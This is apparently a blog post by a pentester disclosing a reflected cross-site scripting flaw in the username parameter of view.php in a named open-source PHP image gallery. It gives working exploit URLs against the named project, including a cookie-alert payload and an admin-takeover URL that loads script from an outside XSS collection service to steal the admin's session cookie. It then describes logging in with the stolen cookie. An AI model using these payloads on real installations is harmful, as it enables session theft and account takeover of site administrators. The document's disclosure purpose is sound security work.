Hi All,
I am Maloy Roy Orko.
Recently in one of my pentest research, I found an Image_Gallery application By Needyamin which is an open source Image Gallery Management System using PHP, MYSQL, JAVASCRIPT.
It is based on the scripting languages of PHP. Image_Gallery is an Image gallery management system using PHP, MYSQL, JAVASCRIPT
Curious to explore its functionalities, I downloaded and set it up in my local system.
After fiddling with the source code, I found that it did not have any kind of Cross Site Scripting protection.
It can lead into Admin Account Takeover and Malicious JavaScript Codes Can Be Executed By Attackers Too.
The Main Thing Is,if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too.Thats why I am trying to inform everyone about this.
- Title of the Vulnerability: Image_Gallery | view.php?username= | Cross Site Scripting (Reflected XSS) | Found By Maloy Roy Orko
- Vulnerability Class: Reflected Cross Site Scripting
- Product Name: Image_Gallery
- Vendor: https://github.com/needyamin/
- Vulnerable Product Link: https://github.com/needyamin/image_gallery/
- Technical Details & Description: The application source code is coded in a way which allows Cross Site Scripting.This can lead into Admin Account Takeover and Malicious JavaScript Codes Can Be Executed By Attackers Too by exploiting Cross Site Scripting Vulnerability.
- Product & Service Introduction: Image_Gallery
Observation & Exploitation:
- Let's see the source code? File(view.php)
- You can see that there is no defense or filter against Cross Site Scripting.Normally They are getting Names and then fetching data From Database According to it but even the gallery names doesn't exist! but They are Showing the gallery Names In Output Which Leads To XSS.
- So Lets See ,How I exploited It? What is the exploitable parameter here?
- view.php?username=
- Lets Take That Parameter and then see the exploit use here!But The Most Important Aim Is To Decide That What You Wanna Do Now With Exploits!
- If you wanna Takeover Admin Then Follow Me!
- Vulnerable Place :
- 192.168.0.101:8080/ima/view.php?username=Your+Exploit
- My Exploit Is: <script>alert(document.cookie);</script>
- So,Lets see an approach and the result?
- My Exploit For This Cookie Enumeration Was:
- http://192.168.0.101:8080/ima/view.php?username=%3Cscript%3Ealert(document.cookie);%3C/script%3E
- Maybe 😏 you are thinking that the cookie is protected by the Httponly Flag ,We can't get into it? 😁
- You are wrong.
- I will show you via Xss Report Now.
- But Lets See An Practical Impact, 😜 huh?
Practical Impact 😉:
- We Will Trap Admin By Letting Him Hit Our Exploited URL.When He visits,we will get the cookie 🍪
- The Exploit (Admin Takeover) Will Be :
- http://192.168.0.101:8080/ima/view.php?username=%3Cscript%20src=https://xss.report/c/ovroking%3E%3C/script%3E
- So,Now we have Everything To Login.Even the admin panel path is also a known one!IT is /admin/
- So Use Your Cookie Editor And Get Into It.
- Lets Login .......! 😁
- Login Successful.
- Guess What ? 😎😎 We Logged In Successfully. We Can Chain Malicious JavaScript Hooking Codes Too🤝
Video POC for SQL INJECTION to XSS :-
Conclusion :-
The main aim of this article is to show that if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too. But I also hope that it helps to give you ideas of how combining attacks can make them much more potent.
0 Comments